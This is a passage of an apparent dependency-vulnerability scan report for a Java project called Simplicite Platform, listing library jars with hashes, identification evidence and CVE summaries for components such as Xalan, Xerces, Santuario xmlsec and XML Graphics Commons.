org/apache/xalan/ Specification-Title Java API for XML Processing Medium Product manifest: org/apache/xalan/xsltc/ Implementation-Title org.apache.xalan.xsltc Medium Product manifest: org/apache/xalan/xsltc/ Specification-Title Java API for XML Processing Medium Product manifest: org/apache/xml/ Implementation-Title org.apache.xml Medium Product manifest: org/apache/xpath/ Implementation-Title org.apache.xpath Medium Product pom artifactid xalan Highest Product pom groupid xalan Highest Product pom name Xalan Java High Product pom parent-artifactid apache Medium Product pom parent-groupid org.apache Medium Product pom url http://xml.apache.org/xalan-j/ Medium Version file version 2.7.2 High Version manifest: java_cup/runtime/ Implementation-Version 2.7.2 Medium Version manifest: org/apache/bcel/ Implementation-Version 2.7.2 Medium Version manifest: org/apache/regexp/ Implementation-Version 2.7.2 Medium Version manifest: org/apache/xalan/ Implementation-Version 2.7.2 Medium Version manifest: org/apache/xalan/xsltc/ Implementation-Version 2.7.2 Medium Version manifest: org/apache/xml/ Implementation-Version 2.7.2 Medium Version manifest: org/apache/xpath/ Implementation-Version 2.7.2 Medium Version pom parent-version 2.7.2 Low Version pom version 2.7.2 Highest
CVE-2022-34169 suppress
The Apache Xalan Java XSLT library is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode. Users are recommended to update to version 2.7.3 or later. Note: Java runtimes (such as OpenJDK) include repackaged copies of Xalan. CWE-681 Incorrect Conversion between Numeric Types
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions: (show all )
xalan-interpretive-11.0.0.jarDescription:
xalan-interpretive License:
Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/docx4j/org/apache/xalan-interpretive/11.0.0/xalan-interpretive-11.0.0.jar
MD5: fc5a8e36ca1cbe5eb05dbf328e058403
SHA1: 7494b62aced4c3d0ffa259e59c435dc9bd7f07b3
SHA256: badfeb922041262d667363e05bd1cea3947f2ad63dc0f586582ef20ab5a52456
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xalan-interpretive High Vendor jar package name apache Highest Vendor jar package name apache Low Vendor jar package name docx4j Highest Vendor jar package name docx4j Low Vendor jar package name org Highest Vendor jar package name org Low Vendor jar package name xalan Highest Vendor pom artifactid xalan-interpretive Highest Vendor pom artifactid xalan-interpretive Low Vendor pom developer email dev@xalan.apache.org Low Vendor pom developer email jason@plutext.org Low Vendor pom developer name Jason Harrop Medium Vendor pom developer name Xalan committers Medium Vendor pom developer org Apache Medium Vendor pom developer org Plutext Medium Vendor pom developer org URL http://people.apache.org/committers-by-project.html#xalan Medium Vendor pom developer org URL http://www.plutext.com Medium Vendor pom groupid org.docx4j.org.apache Highest Vendor pom name xalan-interpretive High Vendor pom url http://xml.apache.org/xalan-j/ Highest Product file name xalan-interpretive High Product jar package name apache Highest Product jar package name apache Low Product jar package name docx4j Highest Product jar package name org Highest Product jar package name org Low Product jar package name xalan Highest Product pom artifactid xalan-interpretive Highest Product pom developer email dev@xalan.apache.org Low Product pom developer email jason@plutext.org Low Product pom developer name Jason Harrop Low Product pom developer name Xalan committers Low Product pom developer org Apache Low Product pom developer org Plutext Low Product pom developer org URL http://people.apache.org/committers-by-project.html#xalan Low Product pom developer org URL http://www.plutext.com Low Product pom groupid org.docx4j.org.apache Highest Product pom name xalan-interpretive High Product pom url http://xml.apache.org/xalan-j/ Medium Version file version 11.0.0 High Version pom version 11.0.0 Highest
xalan-serializer-11.0.0.jarDescription:
xalan-serializer License:
Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/docx4j/org/apache/xalan-serializer/11.0.0/xalan-serializer-11.0.0.jar
MD5: f21112d50f8c5e067bcb388697cb6af1
SHA1: 7a6b5802bdba3d3b12e935b8a0ae2e020d839cfd
SHA256: ee20541b9180bbd4dc4d55b825e397aefc1545d11d819e4d488012fa76a4b6dc
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xalan-serializer High Vendor jar package name apache Highest Vendor jar package name apache Low Vendor jar package name docx4j Highest Vendor jar package name docx4j Low Vendor jar package name org Highest Vendor jar package name org Low Vendor pom artifactid xalan-serializer Highest Vendor pom artifactid xalan-serializer Low Vendor pom developer email dev@xalan.apache.org Low Vendor pom developer email jason@plutext.org Low Vendor pom developer name Jason Harrop Medium Vendor pom developer name Xalan committers Medium Vendor pom developer org Apache Medium Vendor pom developer org Plutext Medium Vendor pom developer org URL http://people.apache.org/committers-by-project.html#xalan Medium Vendor pom developer org URL http://www.plutext.com Medium Vendor pom groupid org.docx4j.org.apache Highest Vendor pom name xalan-serializer High Vendor pom url http://xml.apache.org/xalan-j/ Highest Product file name xalan-serializer High Product jar package name apache Highest Product jar package name apache Low Product jar package name docx4j Highest Product jar package name org Highest Product jar package name org Low Product jar package name xml Low Product pom artifactid xalan-serializer Highest Product pom developer email dev@xalan.apache.org Low Product pom developer email jason@plutext.org Low Product pom developer name Jason Harrop Low Product pom developer name Xalan committers Low Product pom developer org Apache Low Product pom developer org Plutext Low Product pom developer org URL http://people.apache.org/committers-by-project.html#xalan Low Product pom developer org URL http://www.plutext.com Low Product pom groupid org.docx4j.org.apache Highest Product pom name xalan-serializer High Product pom url http://xml.apache.org/xalan-j/ Medium Version file version 11.0.0 High Version pom version 11.0.0 Highest
xercesImpl-2.12.0.jarDescription:
Xerces2 is the next generation of high performance, fully compliant XML parsers in the Apache Xerces family. This new version of Xerces introduces the Xerces Native Interface (XNI), a complete framework for building parser components and configurations that is extremely modular and easy to program.
The Apache Xerces2 parser is the reference implementation of XNI but other parser components, configurations, and parsers can be written using the Xerces Native Interface. For complete design and implementation documents, refer to the XNI Manual.
Xerces2 is a fully conforming XML Schema 1.0 processor. A partial experimental implementation of the XML Schema 1.1 Structures and Datatypes Working Drafts (December 2009) and an experimental implementation of the XML Schema Definition Language (XSD): Component Designators (SCD) Candidate Recommendation (January 2010) are provided for evaluation. For more information, refer to the XML Schema page.
Xerces2 also provides a complete implementation of the Document Object Model Level 3 Core and Load/Save W3C Recommendations and provides a complete implementation of the XML Inclusions (XInclude) W3C Recommendation. It also provides support for OASIS XML Catalogs v1.1.
Xerces2 is able to parse documents written according to the XML 1.1 Recommendation, except that it does not yet provide an option to enable normalization checking as described in section 2.13 of this specification. It also handles namespaces according to the XML Namespaces 1.1 Recommendation, and will correctly serialize XML 1.1 documents if the DOM level 3 load/save APIs are in use.
License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/xerces/xercesImpl/2.12.0/xercesImpl-2.12.0.jar
MD5: b89632b53c4939a2982bcb52806f6dec
SHA1: f02c844149fd306601f20e0b34853a670bef7fa2
SHA256: b50d3a4ca502faa4d1c838acb8aa9480446953421f7327e338c5dda3da5e76d0
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xercesImpl High Vendor jar package name apache Highest Vendor jar package name datatypes Highest Vendor jar package name dom Highest Vendor jar package name parsers Highest Vendor jar package name serialize Highest Vendor jar package name version Highest Vendor jar package name w3c Highest Vendor jar package name xerces Highest Vendor jar package name xinclude Highest Vendor jar package name xml Highest Vendor jar package name xni Highest Vendor manifest: javax/xml/datatype/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: javax/xml/namespace/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: javax/xml/parsers/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: javax/xml/stream/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: javax/xml/transform/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: javax/xml/validation/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: javax/xml/xpath/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: org/apache/xerces/impl/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: org/apache/xerces/xni/ Implementation-Vendor Apache Software Foundation Medium Vendor manifest: org/w3c/dom/ Implementation-Vendor World Wide Web Consortium Medium Vendor manifest: org/w3c/dom/ls/ Implementation-Vendor World Wide Web Consortium Medium Vendor manifest: org/xml/sax/ Implementation-Vendor David Megginson Medium Vendor pom artifactid xercesImpl Highest Vendor pom artifactid xercesImpl Low Vendor pom developer email j-dev@xerces.apache.org Low Vendor pom developer id xerces Medium Vendor pom developer name Apache Software Foundation Medium Vendor pom developer org Apache Software Foundation Medium Vendor pom developer org URL http://www.apache.org Medium Vendor pom groupid xerces Highest Vendor pom name Xerces2-j High Vendor pom url https://xerces.apache.org/xerces2-j/ Highest Product file name xercesImpl High Product hint analyzer product xerces-j Highest Product jar package name apache Highest Product jar package name datatype Highest Product jar package name datatypes Highest Product jar package name dom Highest Product jar package name impl Highest Product jar package name parsers Highest Product jar package name serialize Highest Product jar package name validation Highest Product jar package name version Highest Product jar package name w3c Highest Product jar package name xerces Highest Product jar package name xinclude Highest Product jar package name xml Highest Product jar package name xni Highest Product jar package name xpath Highest Product manifest: javax/xml/datatype/ Implementation-Title javax.xml.datatype Medium Product manifest: javax/xml/datatype/ Specification-Title Java API for XML Processing Medium Product manifest: javax/xml/namespace/ Implementation-Title javax.xml.namespace Medium Product manifest: javax/xml/namespace/ Specification-Title Java API for XML Processing Medium Product manifest: javax/xml/parsers/ Implementation-Title javax.xml.parsers Medium Product manifest: javax/xml/parsers/ Specification-Title Java API for XML Processing Medium Product manifest: javax/xml/stream/ Implementation-Title javax.xml.stream Medium Product manifest: javax/xml/stream/ Specification-Title Streaming API for XML Medium Product manifest: javax/xml/transform/ Implementation-Title javax.xml.transform Medium Product manifest: javax/xml/transform/ Specification-Title Java API for XML Processing Medium Product manifest: javax/xml/validation/ Implementation-Title javax.xml.validation Medium Product manifest: javax/xml/validation/ Specification-Title Java API for XML Processing Medium Product manifest: javax/xml/xpath/ Implementation-Title javax.xml.xpath Medium Product manifest: javax/xml/xpath/ Specification-Title Java API for XML Processing Medium Product manifest: org/apache/xerces/impl/ Implementation-Title org.apache.xerces.impl.Version Medium Product manifest: org/apache/xerces/xni/ Implementation-Title org.apache.xerces.xni Medium Product manifest: org/apache/xerces/xni/ Specification-Title Xerces Native Interface Medium Product manifest: org/w3c/dom/ Implementation-Title org.w3c.dom Medium Product manifest: org/w3c/dom/ Specification-Title Document Object Model, Level 3 Core Medium Product manifest: org/w3c/dom/ls/ Implementation-Title org.w3c.dom.ls Medium Product manifest: org/w3c/dom/ls/ Specification-Title Document Object Model, Level 3 Load and Save Medium Product manifest: org/xml/sax/ Implementation-Title org.xml.sax Medium Product manifest: org/xml/sax/ Specification-Title Simple API for XML Medium Product pom artifactid xercesImpl Highest Product pom developer email j-dev@xerces.apache.org Low Product pom developer id xerces Low Product pom developer name Apache Software Foundation Low Product pom developer org Apache Software Foundation Low Product pom developer org URL http://www.apache.org Low Product pom groupid xerces Highest Product pom name Xerces2-j High Product pom url https://xerces.apache.org/xerces2-j/ Medium Version file version 2.12.0 High Version manifest: org/apache/xerces/impl/ Implementation-Version 2.12.0 Medium Version pom version 2.12.0 Highest
pkg:maven/xerces/xercesImpl@2.12.0 (Confidence :High)cpe:2.3:a:apache:xerces-j:2.12.0:*:*:*:*:*:*:* (Confidence :Low) suppress cpe:2.3:a:apache:xerces2_java:2.12.0:*:*:*:*:*:*:* (Confidence :Low) suppress CVE-2022-23437 suppress
There's a vulnerability within the Apache Xerces Java (XercesJ) XML parser when handling specially crafted XML document payloads. This causes, the XercesJ XML parser to wait in an infinite loop, which may sometimes consume system resources for prolonged duration. This vulnerability is present within XercesJ version 2.12.1 and the previous versions. CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2:
Base Score: HIGH (7.1) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:C CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2017-10355 (OSSINDEX) suppress
sonatype-2017-0348 - xerces:xercesImpl - Denial of Service (DoS)
The software contains multiple threads or executable segments that are waiting for each other to release a necessary lock, resulting in deadlock. CWE-833 Deadlock
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:xerces:xercesImpl:2.12.0:*:*:*:*:*:*:* xhtmlrenderer-3.0.0.jarDescription:
Modified flyingsaucer XML/XHTML and CSS 2.1 renderer, to support docx (and eventually pptx) output
License:
Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/docx4j/xhtmlrenderer/3.0.0/xhtmlrenderer-3.0.0.jar
MD5: d1f1faf911c376261b7698282bbf0c08
SHA1: 14c766017bd26c1b1f96f170833845bc1bab6aeb
SHA256: 7189d588e7888c92da996eded1b5a17ac435eb6193b47e2207805fc458e318c9
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xhtmlrenderer High Vendor jar package name css Highest Vendor jar package name docx Highest Vendor jar package name docx4j Highest Vendor jar package name docx4j Low Vendor jar package name org Highest Vendor jar package name org Low Vendor jar package name xhtmlrenderer Highest Vendor jar package name xhtmlrenderer Low Vendor pom artifactid xhtmlrenderer Highest Vendor pom artifactid xhtmlrenderer Low Vendor pom developer email jason@plutext.org Low Vendor pom developer id jharrop Medium Vendor pom developer name Jason Harrop Medium Vendor pom developer org Plutext Medium Vendor pom groupid org.docx4j Highest Vendor pom name xhtmlrenderer High Vendor pom url http://www.docx4java.org/ Highest Product file name xhtmlrenderer High Product jar package name css Highest Product jar package name docx Highest Product jar package name docx4j Highest Product jar package name org Highest Product jar package name org Low Product jar package name xhtmlrenderer Highest Product jar package name xhtmlrenderer Low Product pom artifactid xhtmlrenderer Highest Product pom developer email jason@plutext.org Low Product pom developer id jharrop Low Product pom developer name Jason Harrop Low Product pom developer org Plutext Low Product pom groupid org.docx4j Highest Product pom name xhtmlrenderer High Product pom url http://www.docx4java.org/ Medium Version file version 3.0.0 High Version pom version 3.0.0 Highest
xmlbeans-3.1.0.jarDescription:
XmlBeans main jar License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/xmlbeans/xmlbeans/3.1.0/xmlbeans-3.1.0.jar
MD5: 408902d943e5bd51a4813dae131681a3
SHA1: 6dac1f897dfb3e3f17fc79b18a3353b2e51c464e
SHA256: a19ea1ec835a101165f7aa3c55427e81b5f2b187bfe7689a19277c51402620b0
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xmlbeans High Vendor jar package name apache Highest Vendor jar package name xmlbeans Highest Vendor manifest: org/apache/xmlbeans/ Implementation-Vendor Apache Software Foundation Medium Vendor pom artifactid xmlbeans Highest Vendor pom artifactid xmlbeans Low Vendor pom developer email cezar.andrei@no#spam#!gma|l.com Low Vendor pom developer email jacob.danner@nos#pam.oracle.com Low Vendor pom developer email radu.preotiuc-pietro@nos#pam.bea.com Low Vendor pom developer email radupr@nos#pam.gm@il.com Low Vendor pom developer email user@poi.apache.org Low Vendor pom developer email wing-yew.poon@nos#pam.oracle.com Low Vendor pom developer id cezar Medium Vendor pom developer id jdanner Medium Vendor pom developer id poi Medium Vendor pom developer id radup Medium Vendor pom developer id wpoon Medium Vendor pom developer name Cezar Andrei Medium Vendor pom developer name Jacob Danner Medium Vendor pom developer name POI Team Medium Vendor pom developer name Radu Preotiuc Medium Vendor pom developer name Wing Yew Poon Medium Vendor pom developer org Apache POI Medium Vendor pom groupid org.apache.xmlbeans Highest Vendor pom name XmlBeans High Vendor pom organization name XmlBeans High Vendor pom organization url https://xmlbeans.apache.org/ Medium Vendor pom url https://xmlbeans.apache.org/ Highest Product file name xmlbeans High Product jar package name apache Highest Product jar package name xmlbeans Highest Product manifest: org/apache/xmlbeans/ Implementation-Title org.apache.xmlbeans Medium Product pom artifactid xmlbeans Highest Product pom developer email cezar.andrei@no#spam#!gma|l.com Low Product pom developer email jacob.danner@nos#pam.oracle.com Low Product pom developer email radu.preotiuc-pietro@nos#pam.bea.com Low Product pom developer email radupr@nos#pam.gm@il.com Low Product pom developer email user@poi.apache.org Low Product pom developer email wing-yew.poon@nos#pam.oracle.com Low Product pom developer id cezar Low Product pom developer id jdanner Low Product pom developer id poi Low Product pom developer id radup Low Product pom developer id wpoon Low Product pom developer name Cezar Andrei Low Product pom developer name Jacob Danner Low Product pom developer name POI Team Low Product pom developer name Radu Preotiuc Low Product pom developer name Wing Yew Poon Low Product pom developer org Apache POI Low Product pom groupid org.apache.xmlbeans Highest Product pom name XmlBeans High Product pom organization name XmlBeans Low Product pom organization url https://xmlbeans.apache.org/ Low Product pom url https://xmlbeans.apache.org/ Medium Version file version 3.1.0 High Version manifest: org/apache/xmlbeans/ Implementation-Version 3.1.0 Medium Version pom version 3.1.0 Highest
xmlgraphics-commons-2.3.jarDescription:
Apache XML Graphics Commons is a library that consists of several reusable
components used by Apache Batik and Apache FOP. Many of these components
can easily be used separately outside the domains of SVG and XSL-FO.
License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/xmlgraphics/xmlgraphics-commons/2.3/xmlgraphics-commons-2.3.jar
MD5: 3edc187a769f9ff50e53f095bccb20cd
SHA1: f0b77d80c4d8f02538512b4d505af0cf5286eb7f
SHA256: 1fb91bac2795f7a768a7665f40cde996023a489ecc43e5ee67ad40fbaa79e194
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xmlgraphics-commons High Vendor jar package name apache Highest Vendor jar package name xmlgraphics Highest Vendor Manifest Implementation-Vendor The Apache Software Foundation (http://xmlgraphics.apache.org/) High Vendor pom artifactid xmlgraphics-commons Highest Vendor pom artifactid xmlgraphics-commons Low Vendor pom groupid org.apache.xmlgraphics Highest Vendor pom name Apache XML Graphics Commons High Vendor pom organization name Apache Software Foundation High Vendor pom organization url http://www.apache.org/ Medium Vendor pom parent-artifactid apache Low Vendor pom parent-groupid org.apache Medium Vendor pom url http://xmlgraphics.apache.org/commons/ Highest Product file name xmlgraphics-commons High Product jar package name apache Highest Product jar package name xmlgraphics Highest Product Manifest Implementation-Title Apache XML Graphics Commons High Product pom artifactid xmlgraphics-commons Highest Product pom groupid org.apache.xmlgraphics Highest Product pom name Apache XML Graphics Commons High Product pom organization name Apache Software Foundation Low Product pom organization url http://www.apache.org/ Low Product pom parent-artifactid apache Medium Product pom parent-groupid org.apache Medium Product pom url http://xmlgraphics.apache.org/commons/ Medium Version file version 2.3 High Version Manifest Implementation-Version 2.3 High Version pom parent-version 2.3 Low Version pom version 2.3 Highest
CVE-2020-11988 suppress
Apache XmlGraphics Commons 2.4 and earlier is vulnerable to server-side request forgery, caused by improper input validation by the XMPParser. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests. Users should upgrade to 2.6 or later. CWE-20 Improper Input Validation, CWE-918 Server-Side Request Forgery (SSRF)
CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N CVSSv3:
Base Score: HIGH (8.2) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N References:
Vulnerable Software & Versions:
xmlsec-2.1.4.jarDescription:
Apache XML Security for Java supports XML-Signature Syntax and Processing,
W3C Recommendation 12 February 2002, and XML Encryption Syntax and
Processing, W3C Recommendation 10 December 2002. As of version 1.4,
the library supports the standard Java API JSR-105: XML Digital Signature APIs.
License:
Apache License, Version 2.0: https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/santuario/xmlsec/2.1.4/xmlsec-2.1.4.jar
MD5: bedb9da77422052baeab84af891392a6
SHA1: cb43326f02e3e77526c24269c8b5d3cc3f7f6653
SHA256: 2e2ec8fe0cf873979f630ae4d35e7ede3390321279b7a15de9deed3f3430990c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xmlsec High Vendor jar package name apache Highest Vendor jar package name encryption Highest Vendor jar package name security Highest Vendor jar package name signature Highest Vendor jar package name xml Highest Vendor Manifest automatic-module-name org.apache.santuario.xmlsec Medium Vendor Manifest bundle-docurl https://www.apache.org/ Low Vendor Manifest bundle-symbolicname org.apache.santuario.xmlsec Medium Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.santuario Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid xmlsec Highest Vendor pom artifactid xmlsec Low Vendor pom groupid org.apache.santuario Highest Vendor pom name Apache XML Security for Java High Vendor pom organization name The Apache Software Foundation High Vendor pom organization url https://www.apache.org/ Medium Vendor pom parent-artifactid apache Low Vendor pom parent-groupid org.apache Medium Vendor pom url https://santuario.apache.org/ Highest Product file name xmlsec High Product jar package name apache Highest Product jar package name encryption Highest Product jar package name security Highest Product jar package name signature Highest Product jar package name xml Highest Product Manifest automatic-module-name org.apache.santuario.xmlsec Medium Product Manifest bundle-docurl https://www.apache.org/ Low Product Manifest Bundle-Name Apache XML Security for Java Medium Product Manifest bundle-symbolicname org.apache.santuario.xmlsec Medium Product Manifest Implementation-Title Apache XML Security for Java High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product Manifest specification-title Apache XML Security for Java Medium Product pom artifactid xmlsec Highest Product pom groupid org.apache.santuario Highest Product pom name Apache XML Security for Java High Product pom organization name The Apache Software Foundation Low Product pom organization url https://www.apache.org/ Low Product pom parent-artifactid apache Medium Product pom parent-groupid org.apache Medium Product pom url https://santuario.apache.org/ Medium Version file version 2.1.4 High Version Manifest Bundle-Version 2.1.4 High Version Manifest Implementation-Version 2.1.4 High Version pom parent-version 2.1.4 Low Version pom version 2.1.4 Highest
pkg:maven/org.apache.santuario/xmlsec@2.1.4 (Confidence :High)cpe:2.3:a:apache:santuario_xml_security_for_java:2.1.4:*:*:*:*:*:*:* (Confidence :Low) suppress cpe:2.3:a:apache:xml_security_for_java:2.1.4:*:*:*:*:*:*:* (Confidence :Low) suppress CVE-2021-40690 suppress
All versions of Apache Santuario - XML Security for Java prior to 2.2.3 and 2.1.7 are vulnerable to an issue where the "secureValidation" property is not passed correctly when creating a KeyInfo from a KeyInfoReference element. This allows an attacker to abuse an XPath Transform to extract any local .xml files in a RetrievalMethod element. CWE-200 Information Exposure
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2023-44483 suppress
All versions of Apache Santuario - XML Security for Java prior to 2.2.6, 2.3.4, and 3.0.3, when using the JSR 105 API, are vulnerable to an issue where a private key may be disclosed in log files when generating an XML Signature and logging with debug level is enabled. Users are recommended to upgrade to version 2.2.6, 2.3.4, or 3.0.3, which fixes this issue.
CWE-532 Information Exposure Through Log Files
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
xmpcore-5.1.3.jarDescription:
The XMP Library for Java is based on the C++ XMPCore library
and the API is similar.
License:
The BSD License: http://www.adobe.com/devnet/xmp/library/eula-xmp-library-java.html File Path: /var/simplicite/.m2/repository/com/adobe/xmp/xmpcore/5.1.3/xmpcore-5.1.3.jar
MD5: 08d154cf297e87471637df85172f93e6
SHA1: 57e70c3b10ff269fff9adfa7a31d61af0df30757
SHA256: 821be907f1e514ebb50f0ca04b2c098370a3cb5e5f9ddcc2ecf81e73eb265daa
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xmpcore High Vendor jar package name adobe Highest Vendor jar package name xmp Highest Vendor Manifest adobeip Low Vendor Manifest builddate 2016 Sep 02 16:31:16-CEST Low Vendor Manifest implementation-debug false Low Vendor Manifest implementation-engbuild 003 Low Vendor Manifest implementation-major 5 Low Vendor Manifest implementation-micro 3 Low Vendor Manifest implementation-minor 1 Low Vendor Manifest Implementation-Vendor Copyright 2006-2009 Adobe Systems Incorporated. All rights reserved High Vendor pom artifactid xmpcore Highest Vendor pom artifactid xmpcore Low Vendor pom developer org Adobe Systems, Inc. Medium Vendor pom developer org URL http://www.adobe.com/ Medium Vendor pom groupid com.adobe.xmp Highest Vendor pom name XMP Library for Java High Vendor pom url http://www.adobe.com/devnet/xmp.html Highest Product file name xmpcore High Product jar package name adobe Highest Product jar package name xmp Highest Product Manifest adobeip Low Product Manifest builddate 2016 Sep 02 16:31:16-CEST Low Product Manifest implementation-debug false Low Product Manifest implementation-engbuild 003 Low Product Manifest implementation-major 5 Low Product Manifest implementation-micro 3 Low Product Manifest implementation-minor 1 Low Product Manifest Implementation-Title Adobe XMP Core High Product pom artifactid xmpcore Highest Product pom developer org Adobe Systems, Inc. Low Product pom developer org URL http://www.adobe.com/ Low Product pom groupid com.adobe.xmp Highest Product pom name XMP Library for Java High Product pom url http://www.adobe.com/devnet/xmp.html Medium Version file version 5.1.3 High Version pom version 5.1.3 Highest
xsom-2.3.2.jarDescription:
XML Schema Object Model (XSOM) is a Java library that allows applications to easily parse XML Schema
documents and inspect information in them. It is expected to be useful for applications that need to take XML
Schema as an input.
File Path: /var/simplicite/.m2/repository/org/glassfish/jaxb/xsom/2.3.2/xsom-2.3.2.jarMD5: 69490072151ce34b84c8d0990a931c6dSHA1: 0157dc2bf479c524d63a214e8fe9888f45a667dbSHA256: 598196320e56138f78895c9bbc3055983d25b76814f072dfcb836f8cc4437c73Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xsom High Vendor jar package name sun Low Vendor jar package name xml Highest Vendor jar package name xml Low Vendor jar package name xsom Highest Vendor jar package name xsom Low Vendor jar (hint) package name oracle Low Vendor pom artifactid xsom Highest Vendor pom artifactid xsom Low Vendor pom groupid org.glassfish.jaxb Highest Vendor pom name XSOM High Vendor pom parent-artifactid project Low Vendor pom parent-groupid org.eclipse.ee4j Medium Product file name xsom High Product jar package name impl Low Product jar package name xml Highest Product jar package name xml Low Product jar package name xsom Highest Product jar package name xsom Low Product pom artifactid xsom Highest Product pom groupid org.glassfish.jaxb Highest Product pom name XSOM High Product pom parent-artifactid project Medium Product pom parent-groupid org.eclipse.ee4j Medium Version file version 2.3.2 High Version pom parent-version 2.3.2 Low Version pom version 2.3.2 Highest
xz-1.8.jarDescription:
XZ data compression License:
Public Domain File Path: /var/simplicite/.m2/repository/org/tukaani/xz/1.8/xz-1.8.jar
MD5: 5f982127e0de85b785c4b2abad21aa2e
SHA1: c4f7d054303948eb6a4066194253886c8af07128
SHA256: 8c7964b36fe3f0cbe644b04fcbff84e491ce81917db2f5bfa0cba8e9548aff5d
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name xz High Vendor jar package name tukaani Highest Vendor jar package name xz Highest Vendor Manifest automatic-module-name org.tukaani.xz Medium Vendor Manifest bundle-docurl https://tukaani.org/xz/java.html Low Vendor Manifest bundle-symbolicname org.tukaani.xz Medium Vendor Manifest implementation-url https://tukaani.org/xz/java.html Low Vendor pom artifactid xz Highest Vendor pom artifactid xz Low Vendor pom developer email lasse.collin@tukaani.org Low Vendor pom developer name Lasse Collin Medium Vendor pom groupid org.tukaani Highest Vendor pom name XZ for Java High Vendor pom url https://tukaani.org/xz/java.html Highest Product file name xz High Product jar package name tukaani Highest Product jar package name xz Highest Product Manifest automatic-module-name org.tukaani.xz Medium Product Manifest bundle-docurl https://tukaani.org/xz/java.html Low Product Manifest Bundle-Name XZ data compression Medium Product Manifest bundle-symbolicname org.tukaani.xz Medium Product Manifest Implementation-Title XZ data compression High Product Manifest implementation-url https://tukaani.org/xz/java.html Low Product pom artifactid xz Highest Product pom developer email lasse.collin@tukaani.org Low Product pom developer name Lasse Collin Low Product pom groupid org.tukaani Highest Product pom name XZ for Java High Product pom url https://tukaani.org/xz/java.html Medium Version file version 1.8 High Version Manifest Bundle-Version 1.8 High Version Manifest Implementation-Version 1.8 High Version pom version 1.8 Highest